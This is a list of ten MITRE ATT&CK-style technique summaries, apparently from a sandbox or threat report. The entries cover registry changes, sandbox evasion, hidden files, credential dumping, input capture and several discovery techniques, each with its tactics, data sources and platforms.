Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre